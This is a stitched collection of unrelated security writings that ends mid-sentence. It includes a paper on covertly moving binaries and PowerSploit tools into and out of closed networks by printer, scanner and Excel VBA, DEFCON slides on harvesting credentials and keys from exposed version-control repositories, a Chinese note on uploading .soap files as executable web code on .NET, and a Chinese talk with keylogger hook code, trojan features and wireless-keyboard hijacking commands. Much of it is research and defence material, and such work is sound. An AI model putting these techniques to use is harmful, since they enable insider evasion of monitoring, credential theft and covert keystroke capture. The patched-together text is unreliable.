Out-of-Band File Transfer on Closed Systems An Insider’s Options Michael Rich @miketofet mike@tofet.net Abstract I present a method of transferring arbitrary binary files to and from an ostensibly closed system using standard office software and readily available office tools while avoiding the use of Internet access or magnetic media. These methods are available to any determined insider. Though the methods are not perfect, I used the techniques presented here in a successful proof-of-concept to deliver a selection of PowerSploit tools to an otherwise clean machine. The Challenge One day I was examining an internal information portal at work and discovered that the system was using client-side data validation to prevent XSS attacks. This sort of security method is very easy to circumvent by using standard penetration testing tools such as TamperData or Burp Suite. I really wanted to see what would happen if I could get the XSS test through to the server. But, I was on a closed system and not at liberty to install software even if I could download those tools. At first I tried to find a way to forge the POST call on my work machine. This machine was your basic Windows box with a desktop full of standard office suites. I identified a couple of candidate options but I was soon distracted by the more generic question: “How can I install those tools that I want to use without alerting anyone?” By “alerting anyone” I mean avoiding those methods that have been specifically secured and monitored on a high-value, closed network. Without going into detail, this generally precludes the use of any magnetic media or connecting to unapproved web or Internet resources. I consider any path that delivers arbitrary data without triggering an alert on established monitoring systems to be considered “out-of-band”. Disclaimer Lest my network admins at work have a heart attack and revoke my access, let me be clear: I conceived of the idea at work but did all my development and testing on my home machine. I remain a loyal and faithful adherent to my user agreements. Resources Almost all general-purpose office networks, if they are to be of use to an organization, have to have a large variety of standard office software installed. They also are typically connected to a multi-function office machine of some kind. Folks simply have to have these tools available if they want to create, collaborate, publish, and share anything of value. On my test machine I limited myself to access to a standard Microsoft Office suite, Adobe Acrobat, and a high quality multi-function office device. Overall Goal and Method The file transfer method I ended up pursuing was using the printer and scanner connected to my network. In any functioning office, it is perfectly normal for folks to print and scan, sometimes in mass quantities. Print jobs and scanned documents flowing to and from a networked printer are not likely to raise any curious security eyebrows. I came up with a series of stages to leverage the printer and scanner as my vector for importing and exporting arbitrary binary data from a system. Each stage consists of printing data to a page from a source system, scanning this page on a scanner attached to closed network, and interpreting the scan on the target system to transfer the arbitrary binary code to the system. This process can also be reversed to remove arbitrary data from the target system as well. For my proof-of-concept I started by printing and scanning raw text-based code snippets, moved on to interpreting a page of hex-encoded data, and finished by generating and using a page- sized bar code. Each stage increased the amount of data that could be packed onto single page of paper until I got to the point where I could use the method to deliver a set of PowerSploit tools to a closed workstation with only three printed and scanned pages Stage 0: Get Microsoft Excel into attack mode “Attack mode” in Microsoft Excel means enabling the Visual Basic for Applications (VBA) development environment. This is built into Excel, but typically not enabled by default. It is trivial to turn it on though. A user simply clicks on "Options" under the "File" Menu, selects "Customize Ribbon", checks the box next to "Developer", and clicks "Ok". This enables a "Developer" tab on the ribbon bar with a "Visual Basic" icon on the far left. Clicking that button opens the VBA development environment. Why is this attack mode? For three main reasons: VBA can create and run arbitrary code, VBA can modify arbitrary files at the byte level, and VBA can execute arbitrary functions in arbitrary DLL files with inputs of the attacker’s choosing. First, with access to VBA an attacker can now run arbitrary code. VBA is a fully fledged, if somewhat annoying, programming language. While doing this research I reinforced a possible law of security engineering: if a user can code, the system isn’t secure. It’s always been known that specialized users, such as programmers with access to code compilers, are a threat to a system’s security. So, we watch them a little more carefully. But every user of a general-purpose office environment has access to a full Integrated Development Environment at all times. Odds are the organization lacks the manpower to watch every user to the same level of fidelity they lavish upon their specialized users. This can create a security seam a malicious insider can exploit. The second reason this puts Excel into attack mode is that VBA allows byte by byte binary reading and writing of arbitrary files. If the user has access to read a file they can basically do anything they want to it at that point. Of course even a minimally secured machine shouldn’t allow the users to modify an important system file, but they can always copy it and modify their copy. This sort of functionality can be leveraged to circumvent security in ways that are only limited by the attacker’s imagination and capability. The third reason is VBA’s ability to make direct calls to arbitrary functions in arbitrary DLLs with arbitrary inputs. VBA can also call an executable file with any arbitrary file name; the file does not have to end with a ".exe" or ".dll" extension. That’s a whole lot of arbitrary to take advantage of. I use it here to eventually run my custom DLL but the bottom line is VBA exposes a lot of attack surface to take advantage of and that's why I call entering Developer mode "putting Excel into attack mode". Stage 1: VBA script import Now that VBA is active, we need it to run code we have carefully written and tested in our lab. This is actually quite straightforward. We simply print the script file in the lab, scan it on the target network, use Adobe Acrobat Optical Character Recognition to turn that scan back in to code, and cut and paste the code back into VBA. This won't be perfect, of course. In the OCR process, Adobe will frequently drop the comment delimiter, making for bad lines of code. It also likes to drop the "=" sign, turning assignment operations into a statement that VBA may interpret as a kind of function call. Luckily for us, VBA is quite likely to highlight any egregious syntax errors in red as shown below: Figure 1: VBA syntax errors Also, once you fix the obvious errors and try to run it for the first time VBA will highlight any run time errors: Figure 2: VBA run time errors It is very possible the code won't work, even though it compiles and runs. In that case the attacker will need to examine what they've got and compare it to their original print out. One consistent mistake I saw was the movement of statements based upon an OCR misinterpretation of indentations or wrap-around lines. For example, consider the word "Value" below: Figure 3: "Value" original location After OCR Adobe moves its location to before all of the comment lines: Figure 4: "Value" final location This same error will be present in any indented code block. The trailing delimiter for that code block will typically get moved to just after the opening delimiter. For example, with a FOR...NEXT statement, Adobe will move the NEXT statement to just under the FOR statement, effectively skipping the entire code block. Luckily VBA doesn't require indentation for its code blocks, they are text-delimited. This means you can remove all of the idents from the code and print and scan it that way. This makes for harder-to-read code but it will maintain the overall code structure. Some amount of editing will almost certainly be needed to make the code work but overall it is quite straightforward to load a script of arbitrary complexity into VBA in this manner. If that script was compact enough the attacker could just type it in, of course. Stage 2: Hex Magic I wrote a VBA script that will take an arbitrary file and generate a printable hex encoded text file out of it. It can also reverse the process to turn hex code back in to the original file. That is a rather straightforward process. The magic comes in by making this hex code printable, scannable, and easily interpreted by the OCR algorithm to recreate the original file with as few errors as possible. I did a lot of tests to figure out how much data I could pack on to a single page of hex code. By using 8 pt Consolas font I was able to get about 3.6kB of data on a single page. But, no matter how finely I scan the hex code, there are always errors in the OCR. Some of these errors are simple transcription errors, such as "1" (one) being converted to "l" (lowercase L) or "5" being read as an "S". This type of error is easy to filter out since a lowercase L and an S are not valid hexadecimal characters and can simply be considered a 1 or a 5 respectively when reading the hex data. Other errors are a little more insidious, such as a "B" (the letter B) being read as an "8" (the number 8). Both B and 8 are valid hex numbers so it isn't clear which one it should be at any given location in scanned hex text. This error is also quite common, so I needed to find an easy way to filter it out. In the end I replaced "B" with "#" and "D" with "?" in the printed text. This eliminated a large number of transcription errors. There are other errors such as added periods and added spaces that also needed to be addressed. I also investigated using other encoding such as Base-64, but that encoding uses almost the entire range of printable characters as valid symbols. Because of this it is impossible to identify a transcription error and the file cannot be recreated. But, no matter how much automatic correction I put in, something is bound to go wrong. With the corrections discussed above--and some other ones visible in the Hex Magic code--I only had 1 error in 1210 lines of printed, scanned, and OCR'd hex text. That was pretty good, but it was an error nonetheless. To help detect these errors, Hex Magic generates a simple 2-byte XOR checksum for each line, and a 2-byte XOR checksum for the whole file. I chose this as my checksum because I needed something compact that I could include with each line that wouldn't take up much space. Also, the XOR function is built into VBA. As Hex Magic decodes scanned and converted hex text, it will highlight all rows where the XOR checksum fails. For example: Figure 5: Checksum errors in Hex Magic At that point, the attacker has to locate the line of hex code in his original document, compare it to the converted hex text and correct the error manually. This may seem daunting but by using "Ctrl-F" to find the offending XOR checksum in Adobe it's actually a straightforward and efficient solution. When using this technique to deliver a 65K payload, I was able to get the file successfully decoded in under 10 minutes. An example of a full hex-encoded page of data can be seen at attachment 1. Hex Magic proved to be very reliable. In fact it could be used to deliver payloads without the need for a scanner. It may be very, very tedious to type in line after line of hex code, but it would work perfectly and leave almost no trace on the network. However, it doesn't put enough data on each page. 3.6K per page is not very efficient. A payload like PowerSploit would need 232 pages of closely printed and scanned text to be delivered. Mimikatz would need 150 pages. But my main goal was never to deliver a final payload with this method; I intended to use HexMagic to deliver an executable capable of encoding and decoding printable data at the pixel level. I called this executable Sideload. Stage 3: The Big Bar Code and the Sideload DLL I wanted to pack as much data on to a single page of paper as possible and to do that I needed every scanned pixel to mean something useful. After considering this problem for a little bit it didn't take me long to realize this is exactly what QR codes, data matrices, and other well- known 2-D barcodes already do. I played around with these for a little while to see just how much data I could squeeze on a single page using traditional 2-D barcodes and ended up with a number around 25 kB. But, as I studied these bar codes, it was clear they were designed with a different problem set in mind. QR codes and their kin are designed to be read by cell phone cameras, or machine vision systems. They are designed to be scanned at strange orientations, in poor lighting, with possible physical defacement. Because they are designed for these circumstances, there is a lot of data area lost to error correction and orientation features. I was in more control of how my bar codes would be read. I was going to carefully put my bar codes on a high-quality scanner. I could control the settings of this scanner to get the best possible image. In short, I could expect far less error than a free-range 2-D bar code would expect. So, I decided to design my own, full page bar code. I kept three main features of 2-D bar codes: bit-level encoding, timing lines, and Reed-Solomon forward error correction. Bit-level encoding simply means that each pixel in the bar code represents a bit state. A white pixel represents an "on" bit and a black pixel represents an "off" bit. I laid my bytes out horizontally across the page, 8 pixels per byte, about 88 bytes per pixel line. These pixel lines represent the "meat" of the bar code, the information the bar code is trying to get across. Timing lines are extra lines in a known pattern built into a specific location of a 2-D bar code to help locate the "meat". After some experimentation, I used lines of alternating light and dark pixels on all four sides of the "meat" of the bar code. An example of what a completed, full-page Big Bar Code looks like can be seen at attachment 2. Using the timing marks, I was able to locate and decode the meat in a scanned bar code with a very high level of success. Typically I was able to decode the bar code with less than 1% error over about 84 kB of encoded data on a scanned page. You can see a heat map of a typical decode trial below. Figure 6: Big Bar Code error heat map Each black pixel represents a successfully decoded bit and the red pixels are missed bits. The pattern shown is pretty typical. My main takeaway from all of my tests was that there will be errors and I need to be able to handle them. That's where Reed-Solomon Forward Error Correction (R-S FEC) comes in. Almost all of the popular 2-D bar codes out there use R-S FEC to handle this exact situation. Despite their widespread use, I struggled to find a working, open source R-S FEC C++ library. The vast majority of the open source R-S libraries out there actually do Forward Erasure Correction and not Forward Error Correction. Forward Erasure Correction is excellent if some of the data is lost during transmission but will not help if the data is present and mangled at the bit level, which is exactly what occurs when reading the Big Bar Code. In the end I wrote my own R-S FEC C++ library with significant help from an excellent python-based tutorial located at: https://en.wikiversity.org/wiki/Reed%E2%80%93Solomon_codes_for_coders After I got all the pieces working, I put them together into a library called Sideload. The Sideload library will take a file, encode it with R-S FEC, split it into one-page Big Bar Code chunks, and generate a bitmap for each page. These bitmaps can be printed at 72 DPI to just about fill a 8.5 by 11 inch page from corner to corner. Along the way the Sideload library will provide the exact file length and calculate the MD5 sum of the original source file. On the target system, the attacker scans the Big Bar Codes, points the Sideload library at the resulting image files, and provides the original file length and MD5 sum. Sideload will pull the data from the images, decode the R-S FEC encoding, and test the resulting binary against the original MD5 sum. If all goes well, you will have then transferred that arbitrary binary data from your source machine to your target machine without using magnetic media. For my proof-of- concept, I bundled the Sideload library into a DLL I could execute from VBA. The Out-of-Band Proof of Concept For my POC I wanted to deliver a portion of the PowerSploit tool set to a system without using magnetic media or downloading it from the network. Here are the steps I took: 1: Create PowerSploit payload zip file 2: Encode payload with Sideload resulting in 3 Big Bar Code sheets to print 3: Print out Hex Magic VBA code 4: Create zip file from Sideload DLL and associated VBA use code 5: Encode the DLL zip file with Hex Magic and print (made about 16 pages) 6: Move to scanner on target system 7: Scan the Hex Magic VBA code 8: Scan the Hex Magic-encoded DLL zip file 9: Scan the 3 Big Bar Codes 10: Move to target computer 11: Put Excel into "attack" mode 12: Convert the Hex Magic VBA scan to text with Adobe OCR 13: Paste the VBA script into Excel, fix as necessary 14: Convert the encoded DLL zip file scan to text with Adobe OCR 15: Load into Excel and decode with Hex Magic script, repairing text as required 16: Unzip the DLL zip file, load the VBA use code into Excel 17: Convert each BBC scan into a PNG using Adobe 18: Set up Sideload VBA script with file names, original file length, and MD5 sum 19: Run script to decode the Big Bar Codes and recover the payload 20: Celebrate! In practice I was able to complete all of the steps of this POC to deliver about 162 kB of PowerSploit tools to my target machine in about 15 minutes. Preventing this Attack This file transfer vector is a bit difficult to stop since it is using standard office tools in a fairly standard manner, but it isn't impossible. The most obvious indicator to look for is the Sideload DLL. As a set code file, it will definitely have a signature that can be detected by anti-virus and other tools, assuming the attacker doesn't attempt to obfuscate the code or use other AV defeat methods. You do have to be careful to not limit your scanning to just ".DLL" files. As I stated previously, VBA can be programmed to call any file as an executable. If you called the file "Sideload.txt" you could still run it from VBA. The next step has to be monitoring or control of the printing and scanning resources. If the data or system you are trying to protect is of high- enough value, then every print job and every scan job should be examined by a reviewer. This will obviously be manpower intensive, as well as something that slows business productivity, so it probably isn't a reasonable control for most circumstances. Lastly, somehow preventing VBA from being turned on in Excel would stop this vector completely. I have not spent any time figuring out how to do this, but it may be possible. Areas for Improvement Improve Big Bar Code decoding: Though I was seeing less than 1% of error in my bit reads during decoding, the pattern of those errors requires me to use quite a bit of space for R-S FEC parity bytes to ensure the message goes through. In my POC about 35% of each Big Bar Code was dedicated to parity meaning I only got about 55 kB of actual data per page (out of a possible 85 kB). R-S works in 255-byte chunks and I have to provide enough parity to handle the likely worst case error rate per chunk. If I can drop the number of bit errors per chunk down, I can dedicate more space to data per bar code. I already did some work in this direction by adding additional timing lines but I ended up with extra errors I didn't expect. I'm sure, with more experimentation, I could improve the results. Use 2^16 R-S FEC: I already mentioned that I had problems finding a working C++ R-S FEC library. Part of that was because I was being picky. I really wanted a library that worked at the 2^16 level whereas those I did find only worked at 2^8. As I stated above, R-S FEC works in 255 byte chunks, unless you use an underlying field math capable of 2^16. Then you will be able to work in chunks of 65535 words of 2 bytes each, for a total of 131 kB-sized chunks. This would be ideal for my application. Currently I'm running at ~35% parity bytes because I have to handle the worst possible error rate in a 255-byte chunk but I've already stated I can decode a bar code with < 1% bit error across the whole page. Since the page only holds 85 kB of data, I would only need 2-3% parity if I was working in 2^16 correction space. This would be a tremendous improvement. There's a catch of course. I actually built a 2^16 R-S FEC algorithm and discovered two problems. First, it is very slow. R-S FEC complexity grows quickly with the size of the code word, so the increase in code word size slowed my tests down tremendously, especially when I started using kilobytes of parity. That wouldn't be a huge problem, except for the fact that the 2^16 algorithm simply wasn't working. It would happily error correct in certain locations and not in others. To help debug this problem I needed to run tests. Every test was taking far too long to run. In the interests of getting a working POC running, I went back to 2^8. I think I can solve this problem eventually and greatly improve the data per page ratio. Use colored pixels: The Big Bar Code only uses 2 colors, so each bit needs its own pixel. If I used 4 colors I could show 2 bits per pixel and double the data per page ratio. If I could use 16 and get 4 bits per pixel, I could manage ~340 kB of data per page. My experiments in this direction showed that it might be possible, but it also introduces further decoding errors in to the process. Printers, even high-quality office laser printers, simply don't cleanly print and clearly scan a stream of essentially random colors at the pixel level. My 4-color attempt did show some promise, but the 16-color trial looked fairly hopeless. I also stopped pursuing this path in the interest of completing a successful POC. Conclusion Users that can write code on their machines represent a possible threat to security, it is as simple as that. What isn't so simple is that every user with access to a standard desktop productivity suite can write code. A security architect needs to examine the system they are trying to secure by taking a step away from firewalls and cable separation and fully explore all of the resources available to an insider. The Hex Magic, R-S FEC library, and Sideload DLL code will be available on github at: github.com/richmr Attachments: 1: Hex encoded file example 2: Full page Big Bar Code example Attachment 1: File.zip 9##1,504#0304140000000800?67342483463#?3EEA0C0000?41F000009000000526F61726#2E747874A5594#AE?C36169?07C81E#880CA5#4026 8#?3,8?#411201E243?31?0E8214#6249F4934885A4AAACECA23?79?#E?73EE2555AA#2F3696462#F92F8#99F73CFF?E8C318?76C439F4?#C98C? 5093,?9948?1?E2C994?1998#4F#998?906?3F#?CC5A#4#AE3763#C9912F1F45516#817F39333379#C?92E2?99EA7C?9C?714#0?016392417AEC4 E29C,1FA3E?4?#1E#301633FA6CCE29E235AEC36193C7?317F3CF55#624672FC52533##209#780#57#?3A#7F0F?8CE#?27CE2A32EC6573EF2C95C C68A,62EC4FF#61F56167AF2E8#843C687297A207583378F?7#933721169C153AE7AF943CF44?E009C#F0A4#7E935#84C235?442#18AA8C2FE69? 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DEFCON 19 // Adam Baldwin Pillaging DVCS Repos ...for fun and profit $ whoami Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin @adam_baldwin Co-Founder of nGenuity Pentester of webs evilpacket.net WTF is DVCS Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Objectives Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Identify web accessible repos Pillage as much info as possible ??? Profit Alexa top million sites Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin GIT HG BZR GIT: 1498 repos HG: 312 repos BZR: 235 repos Repo Identification Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin GIT: .git/HEAD HG: .hg/requires BZR: .bzr/README http://example.com/.git/HEAD W3AF Plugin Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Cloning Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin 0. Check for dir browsing 1. Get predictable files 2. List repo files 3. Download references to files 4. Restore the repo (if possible) Pillaging Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Platform details (.php, .cgi, etc) Downloadable files (.old, .sql) Source Code Credentials / Certs / API Keys Pillaging Ideas Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin .sql / .sql.bz2 .pem config .bak .sql.gz .xls / .xlsx .ini .cfg .tar / .tar.gz .doc / .docx .sh export htpasswd private .qbw / .mny backup id_rsa .pst / .ost confidential dump / .dmp id_dsa settings .csv .txt Thanks to @flirzan & @quitlahok for some of these! Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Montage of fail <- Twitter API <- Facebook API <- MySpace API <- Google API <- Auth Required? Nope Database Passwords <- SSH Keys htpasswd -> Customer Invoices Demo Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin The Tool Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin https://github.com/ngenuity/DVCS-Pillage Questions? adam@ngenuity-is.com // @adam_baldwin Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin References nGenuity: http://ngenuity-is.com http://ngenuity-is.com/blog/2011/mar/22/gotta-git-up-to-get-down/ http://ngenuity-is.com/blog/2011/apr/30/git-pillaging-revisited/ Evilpacket: http://evilpacket.net W3AF: http://w3af.sourceforge.net/ DVCS Pillage Toolkit: http://github.com/ngenuity/dvcs-pillage
.NET 下的⼏种可执⾏⽂件 在net中,⽐较常⻅的⼏种脚本后戳名有,aspx,ashx,asmx,svc等等。(asp等其实并不是由net程序去处理) 在net程序中所有未预编译的程序最终都会进⼊BuildManager, System.Web.Compilation.BulidManager 负责 整站的动态编译。 如果开发者在程序根⽬录的 PrecompiledApp.config 中设置了不更新编译内容后,那么最终在 BuildManager 的 GetVPathBuildResultInternal ⽅法中会进⾏判断,如果⽤户设置了禁⽌更新编译内容且此时程序内置变 量 allowBuildInPrecompile 为false(反向为true)。那么就会抛出程序未预编译的异常 不同后戳的程序会交给不同的handler进⾏处理,⽽这些handler最终都会⾛向GetVPathBuildResultInternal,来 判断程序是否需要编译。 ⽽⼤多数handler在进⼊GetVPathBuildResultInternal时。对allowBuildInPrecompile的赋值都是false 因此,判断后戳程序是否为可执⾏程序,只需要跟进其处理的handler,看它最终是否会进⼊ GetVPathBuildResultInternal或者⼀些其他动态编译⽅法就可以。 在net.framework框架初始的web.config就定义了⼀些⽂件的处理handler。 ⽂件路径:C:\Windows\Microsoft.NET\Framework64{version}\Config\Web.config 如常⻅⼏种⽂件类型所对应的处理handler aspx -> System.Web.UI.PageHandlerFactory ashx -> System.Web.UI.SimpleHandlerFactory asmx -> System.Web.Script.Services.ScriptHandlerFactory svc -> System.ServiceModel.Activation.HttpHandler 通过初始web.config中可以看到net程序中其实还有很多可执⾏程序的⽂件类型。 如⽐较冷⻔,且鲜为⼈知的⼏种类型: rem -> System.Runtime.Remoting.Channels.Http.HttpRemotingHandlerFactory soap -> System.Runtime.Remoting.Channels.Http.HttpRemotingHandlerFactory xamlx -> System.Xaml.Hosting.XamlHttpHandlerFactory 这⾥主要讲解soap,可⻅rem和soap的处理handler其实是同⼀个,在 HttpRemotingHandlerFactory 的 GetHandler ⽅法中,当请求⽅法为GET且⽂件真实存在时。会先交由 WebServiceHandlerFactory 去处理 ⽽后续也会调⽤ GetCompiledType ⽅法进⼊ BulidManager 对⽂件内容进⾏动态编译处理。 soap本身实现的是⼀种远程服务,在写法上,soap和asmx类似。soap需要继承 MarshalByRefObject ,⽽ asmx则继承 WebService 如Demo: <%@ WebService Language="C#" Class="Test" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Collections.Generic; using System.Diagnostics; using System.Web.SessionState; using System.Web.Services; using System.Xml; using System.Web.Services.Protocols; public class Test : MarshalByRefObject { [WebMethod(Description="Test")] public string Chopper(String name) { return name; } } 上传到web根⽬录就可以直接运⾏,因为soap格式的处理在net框架的web.config中就已经声明了。除⽤户⾃ 定义了后戳的处理handler或者删掉了不需要使⽤的handler。在net中默认可以使⽤.soap后戳的可执⾏程序 在调⽤上,soap和asmx类似,不过需要有⼀个地⽅需要注意,在⻚⾯提供测试⽅法以及测试的具体请求包是不能 直接调⽤的,需要先在 x.soap?wsdl 中获取到 soapAction .然后加⼊到请求头中。就可正常调⽤相关⽅法。
从键盘钩子木马到无线键鼠套装劫持 演讲人:石冰 2 0 1 8 PART 01 键盘Hack 目录 CONTENTS PART 02 键盘钩子木马 PART 03 无线键鼠 套装劫持 PART 04 安全建议 01 02 03 04 针对键盘的攻击思路分析 PART 01 键盘Hack 键盘——最常见的输入设备之一 物理键盘 虚拟键盘 机械键盘 ATM机键盘 软键盘 手机键盘 计算机键盘分类 计算机键盘 编码键盘:键盘控制电路的功能 完全靠硬件完成 非编码键盘:键盘控制电路的 功能由硬件和软件共同实现 数字电路 对应按键ASCII码 查询程序 传送程序 译码程序 便于重定义 应用广泛 非编码键盘的短板:键位冲突 搓招搓不出来??? ??? Ghost Key——鬼键 为避免送出错误信号而选择忽略信号 键帽 手指按压薄膜式键盘按键的过程 橡胶弹性垫 导电层1 绝缘层 为键帽在按下时提供足够的弹性 负责连通键盘底部的两层薄膜上的触点 导电层2 触点1 触点2 中心圆孔 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下Q键 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下Q、S键 Q W A S R1 R2 C1 C2 矩阵示意图 C1 C1 9 9 9 Q R1 A R2 9 9 W S 9 电路图 按下Q、W、A键 鬼键 W W A S D W A S D U I O 搞键盘? 键盘钩子木马 木马程序,后台静默记录 射频信号分析 键鼠&适配器—射频技术通信 New idea ATM键盘外设攻击—ATM Skimmer 伪装键盘面板 搭配插卡口和针 孔摄像效果更佳 ATM热感摄像机攻击 l 热感摄像机:分辨并记录物体表面温度,生成热 量分布图。 l 人体体温37℃左右,触摸键盘时产生的温度可以 被摄像机捕捉,并根据热量大小判断按键顺序。 l ATM机键盘由塑料改为金属。 ATM BadUSB物理接入 首先得开锁。。。(不适用国内ATM机环境) Tyupkin木马 Ploutus malware Triton ATM 钥匙ebay、amazon有售 OS攻击 ATM攻击 xp粘滞键后门案例 传统键盘记录器思路分析 PART 02 键盘钩子木马 Windows系统的地基—“事件驱动”模型 应用程序 应用程序 应用程序 Windows消息队列 系统消息队列 应用程序消息队列 操作系统、应用程序和硬件设备 应用程序 操作系统 I/O设备 消息队列 操作系统能感知输入输出设备的状 态变化,如鼠标单击,按键按下等 不直接处理 封装成Msg,转交应用程序 钩子:拦截系统发 送给其它应用程序 的消息。 Windows下的钩子剖析 线程钩子:只监视指定的线程, 既可以是exe也可以是dll 进程钩子:监视系统中所有线程, 必须是dll SetWindowsHookEx(int idHook,HOOKPROC lpfn, HINSTANCE hMod,DWORD dwThreadId) l 设置钩子: SetWindowsHookEx l 释放钩子: UnhookWindowsHookEx l 继续钩子: CallNextHookEx 指定具体ID,表示线程钩子 设置为0,表示全局钩子 LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT key = (PKBDLLHOOKSTRUCT)lParam; //a key was pressed if (wParam == WM_KEYDOWN && nCode == HC_ACTION ) { DoSomething(key); } return CallNextHookEx(keyboardHook, nCode, wParam, lParam); } key->vkCode 记录用户按键 屏蔽用户按键 修改用户按键 …… int main() { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, NULL); MSG msg{ 0 }; //application loop while (GetMessage(&msg, NULL, 0, 0) != 0); UnhookWindowsHookEx(keyboardHook); return 0; } int main() { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, NULL); MSG msg{ 0 }; //application loop while (GetMessage(&msg, NULL, 0, 0) != 0); UnhookWindowsHookEx(keyboardHook); return 0; } LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) int main() { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, NULL); MSG msg{ 0 }; //application loop while (GetMessage(&msg, NULL, 0, 0) != 0); UnhookWindowsHookEx(keyboardHook); return 0; } HHOOK WINAPI SetWindowsHookEx( _In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId ); 添加木马行为 静默安装 自我销毁 开机自启 发送邮件 …… PART 03 无线键鼠劫持 射频信号攻击思路分析 无线键鼠套装 有线键鼠 无线键鼠 无线键鼠 蓝牙协议 2.4GHz 应用较广,但范围有限,且不易携带 一般通过USB接口插无线适配器来 使用,键盘和鼠标通过电池供电。 键盘—计算机连接方式 DIN连接器插头 PS/2接口 USB接口 射频攻击 有线键盘 计算机 有线键盘 射频消息 适配器 转化 发送 计算机 存在攻击风险 录制射频信息 射频攻击 有线键盘 计算机 有线键盘 射频消息 适配器 转化 发送 计算机 存在攻击风险 重放射频信息 Let’s do it 测试设备 罗技ComboMK220无线键鼠套装 Crazyradio 2.4Ghz nRF24LU1+ USB radio dongle l 2.4GHz USB radio dongle l Nordic Semiconductor nRF24LU1+ 芯片 l 2.4GHz radio communication l 0dBm output power (1mW) l 125 radio channels 部署软件环境 l sudo apt-get install sdcc binutils      python python-pip l sudo pip install -U pip l sudo pip install -U -I pyusb l sudo pip install -U platformio 刷新crazyradio pa固件 l git clone https://github.com/bitcraze/crazyradio-firmware l cd crazyradio-firmware l python usbtools/launchBootloader.py l wget https://github.com/bitcraze/crazyradio-firmware/releases/ download/0.53/cradio-pa-0.53.bin l python usbtools/nrfbootload.py flash cradio-pa-0.53.bin 安装设备驱动 Windows操作系统安装: 通过zadig来安装Crazyradio nRF24LU1+ USB radio dongle硬件设备驱动 遇到Windows不读盘时,可以尝试通过 OSX系统测试或检查U盘是否被刷坏 编译Mousejack Project l git clone https://github.com/RFStorm/mousejack.git l cd mousejack l make l make install 扫描&嗅探 usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL] e.g. cd mousejack-master/ ./nrf24-scanner.py -c {1..5} 捕获附近所有设备的数据包 找MAC地址 usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] e.g. cd mousejack-master/ ./nrf24-sniffer.py -a {mac address} 定向捕获数据包 数据采集&重放&中断 分析击键(鼠标左右键、滑轮,键盘按键) 数据规律,进行重放攻击。 network mapper(Denial of Service) usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES] cd nrf-research-firmware ./nrf24-network-mapper.py -a 61:49:66:82:03 l 简单重放攻击 l 任意数据包构造攻击 HackRF One 半双工收发器 支持采样率:2 Msps—20 Msps(正交) 软件控制天线端口功率:最大 50mA 3.3 V 工作频率:1MHz—6GHz l LPC4320/4330 l XC2C64A l MAX2837 l RFFC5072 l MAX5864 l Si5351C l MGA-81563 l SKY13317 l SKY13350 Audacity导入录制按键信息 适配器维持信号 按键信号 Inspectrum分析射频信号 cmake编译时报错 安装liquid-dsp git clone git://github.com/jgaeddert/liquid-dsp.git Sample rate:4000 0000 Symbols:1160 添加amplitude plot振幅图 通过Symbols参数划分波形 等分振幅图,导出数据 设置阈值转二进制串 比对二进制串匹配按键 HackRF录制正常 按键信号 用户按键 Inspectrum导入 射频信号 Inspectrum导出 射频数据 Python脚本转换 为01序列 将01序列设置为某 一按键的基准序列 将用户输入与基准 序列进行比对 打印出最为接近的 按键符号 Invoke-Shellcode payload: https://github.com/EmpireProject /Empire/blob/master/data/modul e_source/code_execution/Invoke- Shellcode.ps1 如何打造更安全的键盘? PART 04 安全建议 安全建议 厂商角度: l 引入serial number,按键无线电信号一次一变 l采用序列号+加密,对序列号进行加密,提高攻 击者攻击代价与难度。 用户角度: l 敏感操作改用安全软键盘 l 不使用小厂的不合规格的键盘&适配器 l 提高无线安全意识,了解参数基本信息 l 登录等操作扫码代替 l 支持更新固件的设备进行固件升级 《中华人民共和国保守国家秘密法》 THANKS 演讲人:石冰 alfredshi@outlook.com
Module 3 Understanding and countering malware’s evasion and self-defence https://github.com/hasherezade/malware_training_vol1 Fingerprinting for evasion Fingerprinting for evasion • Fingerprinting = gathering information about the environment where the executable was deployed • It is used by malware to determine whether it is deployed in a controlled enviromnent, i.e. sandbox, analysis machine • Open source projects with rich sets of techniques: • https://github.com/a0rtega/pafish • https://github.com/LordNoteworthy/al-khaser • https://www.aldeid.com/wiki/ScoopyNG • Presented demos you can find at: • https://github.com/hasherezade/antianalysis_demos Fingerprinting for evasion • PaFish in action: https://github.com/a0rtega/pafish Fingerprinting for evasion • Al-Khaser in action: https://github.com/LordNoteworthy/al-khaser Fingerprinting for evasion • Most of the malware stop their execution once they observe being analyzed – that’s how they protect their real mission from being revealed. Common reactions: • ExitProcess • Infinite sleep loop • Some malware are more tricky, and: • deploy a decoy (i.e. an old variant of Andromeda) • corrupt their execution (i.e. 